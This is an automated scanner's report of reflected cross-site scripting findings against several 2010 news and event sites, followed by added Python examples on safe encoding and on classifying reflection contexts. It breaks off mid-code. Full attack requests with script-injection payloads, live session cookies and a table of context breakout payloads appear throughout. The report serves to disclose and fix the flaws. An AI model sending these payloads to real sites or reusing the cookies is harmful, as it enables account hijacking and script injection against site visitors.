Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; zvents_tracker_sid=L_surqrJ_TtgeiTUn7vSyg.93565011; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiC3JhZGl1c2keIgljaXR5Ig1TYW4gSm9zZSIKZXJyb3JGIg1sYXRpdHVkZWYaMzcuMzE2NDk5OTk5OTk5OTk4AJeNIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--15608a1ab545c581dffcd09fee6db6e51e073270; s_sq=%5B%5BB%5D%5D; welcome=L_surqrJ_TtgeiTUn7vSyg.93565011; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 15 Nov 2010 02:04:53 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 174.122.23.218
X-Runtime: 23
ETag: "bcb7e2c2be4eec9f2ac821e832d643d0"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiCWNpdHkiDVNhbiBKb3NlIgtyYWRpdXNpHiINbGF0aXR1ZGVmGjM3LjMxNjQ5OTk5OTk5OTk5OACXjSIKZXJyb3JGIhJkaXN0YW5jZV91bml0IgptaWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSINdGltZXpvbmUiGEFtZXJpY2EvTG9zX0FuZ2VsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--b4a5a2069ac2cede71eeab9881eb479f97db86d4; path=/; expires=Tue, 15-Feb-2011 02:04:53 GMT; HttpOnly
Content-Length: 48358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/movies?bca30"><script>alert(1)</script>9fc7022dbe7=1" />
...[SNIP]...

3.43. http://events.mercurynews.com/performers [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.mercurynews.com
Path:   /performers

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa537"><script>alert(1)</script>081b4c1c4b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performers?aa537"><script>alert(1)</script>081b4c1c4b2=1 HTTP/1.1
Host: events.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; zvents_tracker_sid=L_surqrJ_TtgeiTUn7vSyg.93565011; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiC3JhZGl1c2keIgljaXR5Ig1TYW4gSm9zZSIKZXJyb3JGIg1sYXRpdHVkZWYaMzcuMzE2NDk5OTk5OTk5OTk4AJeNIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--15608a1ab545c581dffcd09fee6db6e51e073270; s_sq=%5B%5BB%5D%5D; welcome=L_surqrJ_TtgeiTUn7vSyg.93565011; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 15 Nov 2010 02:05:16 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 174.122.23.218
X-Runtime: 31
ETag: "9376e5670915f5b3f41a4aa68c646341"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiCWNpdHkiDVNhbiBKb3NlIgtyYWRpdXNpHiINbGF0aXR1ZGVmGjM3LjMxNjQ5OTk5OTk5OTk5OACXjSIKZXJyb3JGIhJkaXN0YW5jZV91bml0IgptaWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSINdGltZXpvbmUiGEFtZXJpY2EvTG9zX0FuZ2VsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--b4a5a2069ac2cede71eeab9881eb479f97db86d4; path=/; expires=Tue, 15-Feb-2011 02:05:16 GMT; HttpOnly
Content-Length: 50288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/performers?aa537"><script>alert(1)</script>081b4c1c4b2=1" />
...[SNIP]...

3.44. http://events.mercurynews.com/restaurants [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.mercurynews.com
Path:   /restaurants

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33257"><script>alert(1)</script>16f8b094cda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /restaurants?33257"><script>alert(1)</script>16f8b094cda=1 HTTP/1.1
Host: events.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; zvents_tracker_sid=L_surqrJ_TtgeiTUn7vSyg.93565011; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiC3JhZGl1c2keIgljaXR5Ig1TYW4gSm9zZSIKZXJyb3JGIg1sYXRpdHVkZWYaMzcuMzE2NDk5OTk5OTk5OTk4AJeNIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--15608a1ab545c581dffcd09fee6db6e51e073270; s_sq=%5B%5BB%5D%5D; welcome=L_surqrJ_TtgeiTUn7vSyg.93565011; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 15 Nov 2010 02:05:11 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 174.122.23.218
X-Runtime: 26
ETag: "4b9a2c25a7455fd486c0a373edd1cb25"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiCWNpdHkiDVNhbiBKb3NlIgtyYWRpdXNpHiINbGF0aXR1ZGVmGjM3LjMxNjQ5OTk5OTk5OTk5OACXjSIKZXJyb3JGIhJkaXN0YW5jZV91bml0IgptaWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSINdGltZXpvbmUiGEFtZXJpY2EvTG9zX0FuZ2VsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--b4a5a2069ac2cede71eeab9881eb479f97db86d4; path=/; expires=Tue, 15-Feb-2011 02:05:11 GMT; HttpOnly
Content-Length: 62158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/restaurants?33257"><script>alert(1)</script>16f8b094cda=1" />
...[SNIP]...

3.45. http://events.mercurynews.com/venues [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.mercurynews.com
Path:   /venues

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 305e4"><script>alert(1)</script>1a2aba766b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /venues?305e4"><script>alert(1)</script>1a2aba766b3=1 HTTP/1.1
Host: events.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; zvents_tracker_sid=L_surqrJ_TtgeiTUn7vSyg.93565011; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiC3JhZGl1c2keIgljaXR5Ig1TYW4gSm9zZSIKZXJyb3JGIg1sYXRpdHVkZWYaMzcuMzE2NDk5OTk5OTk5OTk4AJeNIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--15608a1ab545c581dffcd09fee6db6e51e073270; s_sq=%5B%5BB%5D%5D; welcome=L_surqrJ_TtgeiTUn7vSyg.93565011; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 15 Nov 2010 02:05:09 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 174.122.23.218
X-Runtime: 24
ETag: "ae8f296626583360b038a50f39b5bec3"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiCWNpdHkiDVNhbiBKb3NlIgtyYWRpdXNpHiINbGF0aXR1ZGVmGjM3LjMxNjQ5OTk5OTk5OTk5OACXjSIKZXJyb3JGIhJkaXN0YW5jZV91bml0IgptaWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSINdGltZXpvbmUiGEFtZXJpY2EvTG9zX0FuZ2VsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--b4a5a2069ac2cede71eeab9881eb479f97db86d4; path=/; expires=Tue, 15-Feb-2011 02:05:09 GMT; HttpOnly
Content-Length: 53864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/venues?305e4"><script>alert(1)</script>1a2aba766b3=1" />
...[SNIP]...

3.46. http://fisherinvestments.tt.omtrdc.net/m2/fisherinvestments/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fisherinvestments.tt.omtrdc.net
Path:   /m2/fisherinvestments/mbox/standard

Issue detail

The value of the mbox request parameter is copied into a single-quoted JavaScript string literal (the first argument of mboxFactories.get('default').get(...)) in a response served as text/javascript. The payload 86612<script>alert(1)</script>28ae8f0c402 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

The reflection is unfiltered, but a <script> tag inside a JavaScript string literal is inert, so this payload does not execute as submitted; the test that matters is whether a single quote passes through, since ' would close the string and let attacker code follow. The script is requested by www.fi.com pages with mbox set by the page's own Test&Target tag, so practical exploitation also needs a way to make a page request it with an attacker-chosen mbox value, which this finding does not show.

Request

GET /m2/fisherinvestments/mbox/standard?mboxHost=www.fi.com&mboxSession=1289788918105-814297&mboxPC=1289788918105-814297.20&mboxPage=1289789030080-283018&screenHeight=1200&screenWidth=1920&browserWidth=1192&browserHeight=836&browserTimeOffset=-360&colorDepth=undefined&mboxCount=1&mbox=FI_Alley_Letter_1K_TopLeft_Box86612<script>alert(1)</script>28ae8f0c402&mboxId=0&mboxTime=1289767430200&mboxURL=http%3A%2F%2Fwww.fi.com%2Fweballey%2Falleyletter.aspx%3Fcountry%3DUS%26PC%3DBANBANGA06%26CC%3DE599%26tycode%3Dfi2&mboxReferrer=http%3A%2F%2Fredcated%2FINV%2Fiview%2F255848431%2Fdirect%2F01%3Ftime%3D1289788980398715%26click%3Dhttp%3A%2F%2Fus.ard.yahoo.com%2FSIG%3D1633vc023%2FM%3D601059734.601396926.490165551.437049551%2FD%3Dnchome%2FS%3D2022775704%3ALREC%2FY%3DPARTNER_US%2FL%3D0f9637da-f062-11df-b499-bfd373c14344%2FB%3DrnRzDtFJo9U-%2FJ%3D1289788980398715%2FK%3Df4FF1VJJPGvwH7USsI1TdQ%2FEXP%3D1289796180%2FA%3D2105245011572051340%2FR%3D2%2FX%3D2%2F*&mboxVersion=39 HTTP/1.1
Accept: */*
Referer: http://www.fi.com/weballey/alleyletter.aspx?country=US&PC=BANBANGA06&CC=E599&tycode=fi2
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: fisherinvestments.tt.omtrdc.net
Proxy-Connection: Keep-Alive
Pragma: no-cache

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 152
Date: Mon, 15 Nov 2010 03:52:31 GMT
Server: Test & Target

mboxFactories.get('default').get('FI_Alley_Letter_1K_TopLeft_Box86612<script>alert(1)</script>28ae8f0c402',0).setOffer(new mboxOfferDefault()).loaded();
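Worked example for findings 3.38, 3.39, 3.40 and 3.46 (added here; not code from the report or from goingup.com, AddThis or Adobe Test&Target): hypothetical server-side rendering of the two JavaScript response shapes captured above, a JSONP wrapper whose callback comes from the query string and a script that assigns query-string values to JavaScript string variables, with the callback restricted to a dotted identifier and the values emitted as JSON-encoded string literals. The render_* function names, the 64-character callback limit and the error body are assumptions; the payloads are the scanner's.

```python
"""Emit untrusted query-string values into a JavaScript response safely.

Added example; not code from the report or from goingup.com, AddThis or
Adobe Test&Target. render_jsonp() and render_tracker() are hypothetical
reconstructions of the response shapes captured in findings 3.38, 3.39,
3.40 and 3.46."""
import json
import re

# A JSONP callback is a dotted JavaScript identifier path, e.g. _ate.ad.hpr.
_CALLBACK_RE = re.compile(r"^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$")


def valid_callback(name):
    """Allow-list check; the 64-character cap is an assumption, not a spec."""
    return len(name) <= 64 and _CALLBACK_RE.match(name) is not None


def js_string_literal(value):
    """Double-quoted JS string literal for value. json.dumps escapes quote,
    backslash, control characters and non-ASCII; escaping < and > as well
    keeps the literal safe when the script is inlined in HTML, where a raw
    </script> or <!-- inside the string would end the script element."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def render_jsonp(callback, payload):
    """(status, headers, body) for a JSONP endpoint like /red/psi/p.json."""
    headers = {"Content-Type": "text/javascript; charset=utf-8",
               "X-Content-Type-Options": "nosniff"}   # stop HTML sniffing of the script
    if not valid_callback(callback):
        return 400, headers, "/* invalid callback */"
    return 200, headers, "%s(%s);" % (callback, json.dumps(payload))


def render_tracker(site_id, badge):
    """Assign query-string values to JS variables, as tracker.js does with st and b."""
    return ('if(typeof guSiteId=="undefined"){var guSiteId=%s}'
            'if(typeof guBadge=="undefined"){var guBadge=%s}'
            % (js_string_literal(site_id), js_string_literal(badge)))


# Scanner payloads taken from the report, plus a quote breakout the scanner did not send.
SCANNER_CALLBACK = "_ate.ad.hpr9fe88<script>alert(1)</script>fa305a07b2a"
SCANNER_BADGE = "52581e<script>alert(1)</script>b823be43aed"
BREAKOUT_BADGE = '5";alert(1);//'

if __name__ == "__main__":
    print(render_jsonp("_ate.ad.hpr", {"urls": [], "segments": []}))
    print(render_jsonp(SCANNER_CALLBACK, {}))
    print(render_tracker("xpjgr2n", SCANNER_BADGE))
    print(render_tracker("xpjgr2n", BREAKOUT_BADGE))
```

The scanner's callback is rejected outright, and both badge payloads come back as a single string literal: the angle brackets become \u003c and \u003e, and the quote in the breakout variant is escaped, so nothing leaves the string. The nosniff header closes the remaining path by which a JavaScript response could be rendered as HTML.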

3.47. http://forums.contracostatimes.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.contracostatimes.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks: the inline SiteCatalyst script builds s.prop4 from the request path and query string. The payload 4adba"-alert(1)-"e41b940e332 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response: the first " in the payload closes the string literal, -alert(1)- is evaluated as an arithmetic expression, and the trailing " reopens a string so the statement stays syntactically valid and the rest of the analytics block still runs.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; here the analytics value can be taken from location.pathname and location.search on the client instead. If it must be emitted server-side, encode it as a JavaScript string literal (quote, backslash, line terminators and < escaped); HTML entity encoding does not help inside a <script> block, because entities are not decoded there.

Request

GET /?4adba"-alert(1)-"e41b940e332=1 HTTP/1.1
Host: forums.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESS9e585f50d5cd2ca75de6d8dfa5981bd5=68011fed6a78ec690b4356a0c08486bb;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:05:51 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
pt language="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / ?4adba"-alert(1)-"e41b940e332=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.48. http://forums.contracostatimes.com/poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.contracostatimes.com
Path:   /poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks, the same s.prop4 analytics sink as on the site root. The payload 41bf8"-alert(1)-"353834f6171 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that the response is a 404 Not Found: the error page is rendered from the same template and still echoes the request path into the inline script, so the injection works for any path under the host, not only for pages that exist.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /poll41bf8"-alert(1)-"353834f6171/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11 HTTP/1.1
Host: forums.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESS9e585f50d5cd2ca75de6d8dfa5981bd5=68011fed6a78ec690b4356a0c08486bb;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:05:27 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:05:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
language="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / poll41bf8"-alert(1)-"353834f6171/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getC
...[SNIP]...

3.49. http://forums.contracostatimes.com/poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.contracostatimes.com
Path:   /poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1011"-alert(1)-"87110bc119c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11d1011"-alert(1)-"87110bc119c HTTP/1.1
Host: forums.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESS9e585f50d5cd2ca75de6d8dfa5981bd5=68011fed6a78ec690b4356a0c08486bb;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:05:31 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:05:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
e="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11d1011"-alert(1)-"87110bc119c";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...
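Worked example covering the reflection contexts seen across findings 3.35 through 3.49 (added here; not code from the report or from any scanner): a small classifier that finds where an alphanumeric canary landed in a response, names the context (XML text, HTML attribute, string literal in a script response, JSONP function position, string literal in an inline script) and picks the breakout that context needs, which is the step that separates the tag-injection findings from the ones where a <script> payload is inert. The sample bodies are constructed to mirror the captured responses, the canary and probe strings are assumptions, and the JavaScript scan is a simplification that ignores comments and regex literals.

```python
"""Locate a reflected canary in a response and name the syntactic context it
landed in, then pick the breakout that fits. Added example; not code from
the report or from any scanner. The sample bodies are constructed to mirror
the captured responses in findings 3.35, 3.36, 3.38, 3.40, 3.41 and 3.47,
and the scanning is a deliberate simplification (no JS comment or regex
tracking, no CDATA sections)."""
import re

JS_TYPES = ("application/javascript", "text/javascript", "application/x-javascript")
XML_TYPES = ("text/xml", "application/xml")


def js_string_state(code):
    """Quote character of an unterminated JS string literal at the end of code, else None."""
    quote, i = None, 0
    while i < len(code):
        c = code[i]
        if quote:
            if c == "\\":
                i += 1                      # skip the escaped character
            elif c == quote:
                quote = None
        elif c in "\"'`":
            quote = c
        i += 1
    return quote


def attr_quote(tag_text):
    """Quote character of an unterminated attribute value inside a tag, else None."""
    quote = None
    for c in tag_text:
        if quote:
            if c == quote:
                quote = None
        elif c in "\"'":
            quote = c
    return quote


def markup_context(body, pos, kind):
    """Text vs. tag vs. quoted attribute value at offset pos of an HTML/XML body."""
    before = body[:pos]
    lt, gt = before.rfind("<"), before.rfind(">")
    if lt > gt:
        q = attr_quote(before[lt:])
        return "%s-attribute(%s)" % (kind, q) if q else kind + "-tag"
    return kind + "-text"


def html_context(body, pos):
    """Like markup_context, but script element content is raw text, so check it first."""
    before = body[:pos]
    opens = [m.end() for m in re.finditer(r"<script\b[^>]*>", before, re.I)]
    closes = [m.start() for m in re.finditer(r"</script\s*>", before, re.I)]
    if opens and (not closes or closes[-1] < opens[-1]):
        q = js_string_state(before[opens[-1]:])
        return "script-string(%s)" % q if q else "script-code"
    return markup_context(body, pos, "html")


def classify(content_type, body, canary):
    """Context of the first reflection of canary, or 'not-reflected'."""
    pos = body.find(canary)
    if pos < 0:
        return "not-reflected"
    mime = content_type.split(";")[0].strip().lower()
    if mime in JS_TYPES:
        q = js_string_state(body[:pos])
        return "js-string(%s)" % q if q else "js-code"
    if mime in XML_TYPES:
        return markup_context(body, pos, "xml")
    return html_context(body, pos)


# Breakout per context. The js-* entries only execute if some page includes the
# script with attacker-chosen parameters or a browser sniffs the response as HTML.
PROBES = {
    "html-text": "<script>alert(1)</script>",
    'html-attribute(")': '"><script>alert(1)</script>',
    "html-attribute(')": "'><script>alert(1)</script>",
    'script-string(")': '"-alert(1)-"',
    "script-string(')": "'-alert(1)-'",
    'js-string(")': '"-alert(1)-"',
    "js-string(')": "'-alert(1)-'",
    "js-code": "alert(1)//",
    "xml-text": "<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>",
}


def suggest_probe(context):
    return PROBES.get(context)


CANARY = "q7593bq"
SAMPLES = {   # constructed; shapes follow the report's captured bodies
    "xml": "<response><widgets><widget><app-id>58c04479-79ac-" + CANARY + "</app-id>",
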